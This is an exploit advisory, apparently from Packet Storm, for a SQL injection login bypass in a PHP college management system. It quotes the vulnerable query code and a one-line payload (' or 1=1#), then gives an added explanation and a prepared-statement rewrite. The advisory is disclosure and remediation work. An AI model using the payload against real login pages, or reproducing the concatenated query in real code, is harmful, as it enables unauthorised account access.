## https://sploitus.com/exploit?id=PACKETSTORM:164379
# Exploit Title: college management system - SQL Injection Authentication Bypass  
# Date: 01/10/2021  
# Exploit Author: Abdulrahman https://twitter.com/infosec_90  
# Vendor Homepage: https://www.eedunext.com/  
# Software Link: https://code-projects.org/college-management-system-in-php-with-source-code/  
# Version: 1.0  
# Tested on: Kali Linux  
  
  
In login/login.php, line 8:  
  
$username=$_POST["email"];  
$password=$_POST["password"];  
  
$query="select * from login where user_id='$username' and Password='$password' ";  
$result=mysqli_query($con,$query);  
  
  
POC :  
http://127.0.0.1/2/College-Management-System/login/login.php  
username : ' or 1=1#  
password : 123456
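
Added example (not part of the original advisory or the vendor's code): the query above concatenates $_POST["email"] into the SQL string, so the quote in the POC username closes the user_id literal, "or 1=1" makes the WHERE clause true for every row, and "#" comments out the password check. A hardened rewrite of the same lookup with a mysqli prepared statement follows. Assumptions: $con is the application's existing mysqli connection, the Password column stores password_hash() output, and check_login() and the session handling are hypothetical names and steps chosen for illustration.

```php
<?php
// Added example: hardened form of the login lookup quoted in the advisory.
// Assumptions: $con is the application's open mysqli connection, and the
// Password column holds password_hash() output rather than plaintext.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);

// check_login() is a hypothetical helper name, not from the project.
function check_login(mysqli $con, string $username, string $password): ?array
{
    // The placeholder keeps user input out of the SQL text, so a quote or
    // '#' in $username is compared as data and cannot change the WHERE clause.
    $stmt = $con->prepare(
        'SELECT user_id, Password FROM login WHERE user_id = ? LIMIT 1'
    );
    $stmt->bind_param('s', $username);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();

    // The password is checked in PHP against the stored hash, never in SQL.
    if (!$row || !password_verify($password, $row['Password'])) {
        return null;
    }
    return $row;
}

$username = $_POST['email'] ?? '';
$password = $_POST['password'] ?? '';

// Reject array-typed parameters such as email[]=x before they reach the query.
if (!is_string($username) || !is_string($password)) {
    http_response_code(400);
    exit;
}

$user = check_login($con, $username, $password);
if ($user === null) {
    http_response_code(401);
    exit('Invalid credentials');
}

// Illustrative post-login step: issue a fresh session ID on success.
session_start();
session_regenerate_id(true);
$_SESSION['user_id'] = $user['user_id'];
```

With this version the POC username is looked up as a literal user_id, matches no row, and the request ends with the 401 response.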